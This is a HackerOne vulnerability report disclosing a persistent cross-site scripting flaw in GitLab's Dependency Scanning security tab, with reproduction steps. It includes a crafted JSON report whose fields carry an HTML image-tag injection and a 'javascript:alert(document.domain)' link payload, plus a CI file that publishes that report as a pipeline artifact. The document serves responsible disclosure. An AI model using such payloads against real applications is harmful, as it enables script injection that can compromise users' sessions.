Dependency scanning Security Tab is Vulnerable to Persistent XSS

HackerOne report #418074 by ngalog on 2018-10-03:

Details: PoC:

Private project: https://gitlab.com/golduserngalog/securitything/pipelines/31864346
Click Security Tab
Click Dependency Scanning Expand
Click Proto...
Click Links
Popup

{F354647}

Steps to reproduce:

Create a new project, enable auto devops
Create following files, .gitlab-ci.yml and gl-dependency-scanning-report.json

gl-dependency-scanning-report.json

[  
   {  
      "tool":"retire",
      "tools":[  
         "retire"
      ],
      "message":"Proto<img src=x>&lt;img src=&gt;type pollution attack for extend",
      "url":"javascript:alert(document.domain)//https://hackerone.com/reports/381185",
      "cve":"Protot<img src=x>&lt;img src=&gt;ype pollution attack for extend",
      "priority":"Crit<img src=x>&lt;img src=&gt;ical"
   }
]

.gitlab-ci.yml

image: alpine

.sast:
  script:
    - echo hi
  artifacts:
    paths:
    - gl-sast-report.json
    
    
dependency_scanning:
  script:
    - echo hi
  artifacts:
    paths:
    - gl-dependency-scanning-report.json

Impact

Persistent xss in security tab, also fire under security dashboard

Attachments

Warning: Attachments received through HackerOne, please exercise caution!

Screen_Shot_2018-10-03_at_9.50.49_PM.png

Edited Oct 17, 2018 by Alexander Dietrich